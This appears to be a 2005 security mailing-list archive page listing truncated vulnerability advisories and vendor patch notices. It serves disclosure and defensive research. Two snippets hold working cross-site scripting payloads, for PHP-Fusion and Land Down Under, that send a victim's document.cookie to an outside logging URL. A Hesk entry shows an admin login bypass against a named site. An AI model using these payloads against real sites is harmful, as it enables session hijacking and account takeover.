|
|
Colapse all |
Post message
iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability 2005-08-29 iDEFENSE Labs (labs-no-reply idefense com) BNBT EasyTracker Remote Denial of Service Vulnerability 2005-08-30 Sowhat . (smaillist gmail com) BNBT EasyTracker Remote Denial of Service Vulnerability by Sowhat Last Update:2005.08.30 http://secway.org/advisory/AD20050830.txt Vendor: http://bnbteasytracker.sourceforge.net/ Product Affected: 7.7r3.2004.10.27 and below Overview: BNBT was written by Trevor Hogan. BNBT is a complete port [ more ] [ reply ] iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability 2005-08-29 iDEFENSE Labs (labs-no-reply idefense com) Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability iDEFENSE Security Advisory 08.29.05 www.idefense.com/application/poi/display?id=296&type=vulnerabilities August 29, 2005 I. BACKGROUND Adobe Version Cue is a software version tracking system for Adobe products distributed with Ad [ more ] [ reply ] SUSE Security Announcement: pcre integer overflows (SUSE-SA:2005:048) 2005-08-30 Marcus Meissner (meissner suse de) SUSE Security Announcement: php4/php5 Pear::XML_RPC code injection and PCRE integer overflow problems (SUSE-SA:2005:049) 2005-08-30 Marcus Meissner (meissner suse de) [SECURITY] [DSA 789-1] New PHP 4 packages fix several vulnerabilities 2005-08-29 joey infodrom org (Martin Schulze) AutoLinks Pro 2.1 2005-08-28 none none com [NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability ======================================================================== ===== Software: AutoLinks Pro Version: 2.1 Type: Remote PHP File Include Vulnerability Risc: High Date: 16.08.05 Vendor: ScriptsCenter Page: http:/ [ more ] [ reply ] Re: Sophos Antivirus Library Remote Heap Overflow 2005-08-28 list rem0te com You are partially correct. Prior to this advisory, Sophos & rem0te agreed to w/hold details until all fixes were available (August 26th). The Sophos link you provided below does not disclose any details of the vulnerability - only the patch - which leaves a lot of people guessing about the actual vu [ more ] [ reply ] WASC-Articles: 'Preventing Log Evasion in IIS' 2005-08-29 contact webappsec org The Web Application Security Consortium is proud to present 'Preventing Log Evasion in IIS', written by Robert Auger. In this paper Robert describes an issue which allows an attacker to evade multiple aspects of logging within an IIS server environment, as well as how to remediate the problem. This [ more ] [ reply ] PunBB BBCode IMG Tag Script Injection Vulnerability 2005-08-29 y3dips echo or id ECHO_ADV_22$2005 ------------------------------------------------------------------------ --- PunBB BBCode IMG Tag Script Injection Vulnerability ------------------------------------------------------------------------ --- Author: y3dips Date: August, 20th 2005 Location: Indonesia, Jakar [ more ] [ reply ] Re: unload event in ie/mozilla/opera 2005-08-28 gegegz aol com "that means you can "keep" the user on a site. when you type a new url in the address-bar, javascript overwrites it." Annoying, but not very dangerous. When I type a new url, I get brought to a "file://localhost/[...]/unload.html". Then I type a new url, and that's ok. I wouldn't disable javascr [ more ] [ reply ] Vulnerability in Helpdesk software Hesk 0.92 2005-08-29 s2b hotmail com By The Name Of Allah Vulnerability in Helpdesk software Hesk .. Vulnerability Type : Login into The Administrator Menu With out Password Injected version : Helpdesk software Hesk 0.92 Vulnerability Example http://www.springporttwppd.com/helpdesk/ add : admin.php http://www.springporttwppd.com [ more ] [ reply ] [SECURITY] [DSA 788-1] New kismet packages fix arbitrary code execution 2005-08-29 joey infodrom org (Martin Schulze) SimplePHPBlog Arbitrary File Deletion and Sample Exploit 2005-08-29 'ken'@FTU (ken ftusecurity com) SimplePHPBlog has a vulnerability in its comment_delete_cgi.php. The PHP script allows for the arbitrary deletion of files. Please see following link for a perl script to demonstrate the exploit: http://www.ftusecurity.com/pub/sphpblog_vulns (Please add .pl extension as my ISP server preprocesses [ more ] [ reply ] Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities 2005-08-29 h4cky0u org gmail com TITLE: ====== Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities SEVERITY: ========= Medium SOFTWARE: ========= Land Down Under version 801 and prior Support Website : http://www.neocrome.net INFO: ===== Land Down Under is a multiple portal system which includes many dif [ more ] [ reply ] [cosmoshop <= 8.10.78] be the shopadmin in one step 2005-08-29 innate gmx de author : l0om innate| @t | gmx.de WWW.EXCLUDED.ORG product: cosmoshop version: <= 8.10.78 problem: 1. sql injection 2. cleartext passwords 3. view any file maunuf.: www.cosmoshop.de what is cosmoshop ***************** cosmoshop is a comercial shop system written as a CGI. where is the pr [ more ] [ reply ] Multiple vulnerabilities in BFCommand & Control for Battlefield 1942 and Vietnam 2005-08-29 Luigi Auriemma (aluigi autistici org) Secunia Research: SqWebMail HTML Emails Script InsertionVulnerability 2005-08-29 Secunia Research (vuln secunia com) PHP-Fusion <= v6.00.107 XSS exploit 2005-08-28 slacker4ever_1 juno com Hello we haved found a vulnerability in PHP-Fusion <=v6.00.107 which allows us to steal cookies. The exploit works because of badly coded bbcode. Well here is the exploit. [URL=http://aaaaaa.com/UR[url=aa.com&& OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+c ookie; location= [ more ] [ reply ] Xcon2005 papers released 2005-08-29 alert7 (alert7 xfocus org) hi all: Xcon2005 closed successful on Aug 20th, 2005 Those papers released in http://xcon.xfocus.org/ Chinese version papers in http://xcon.xfocus.net/ Hacking Windows CE..............................................-- by San Windows Kernel Pool Overflow Exploitation ......................-- by [ more ] [ reply ] Land Down Under 2005-08-28 bendeniz_avci hotmail com Bug finder:spyMASter Web site:Realhackers.net Contact:bendeniz_avci (at) hotmail (dot) com [email concealed] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code <SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCR [ more ] [ reply ] RE: Sophos Antivirus Library Remote Heap Overflow 2005-08-27 Dowling, Gabrielle (dowlingg sullcrom com) Sophos has had a fix for since August 5th... http://www.sophos.com/support/knowledgebase/article/3409.htmlj. The vulnerability was also publicly discussed prior to that time. G -----Original Message----- From: list (at) rem0te (dot) com [email concealed] [mailto:list (at) rem0te (dot) com [email concealed]] Sent: Friday, August 26, 2005 8:36 [ more ] [ reply ] Re: Tool for Identifying Rogue Linksys Routers 2005-08-26 Mike Kershaw (dragorn kismetwireless net) > > Is there a scanning tool out there that can determine if there are > > unauthorized Linksys (type) routers in a specific VLAN? > > Try pinging all hosts using nmap: > > Then find MAC addresses that are from Linksys's space. I know macchanger > [1] has a list of what addresses belong to which ve [ more ] [ reply ] MDKSA-2005:153 - Updated gnumeric packages fix integer overflow vulnerability 2005-08-26 Mandriva Security Team (security mandriva com) |
|
Privacy Statement |
iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=297&type=vulnerabilities
August 29, 2005
I. BACKGROUND
Adobe Version Cue is a software version tracking system for Adobe
products distributed with Ado
[ more ] [ reply ]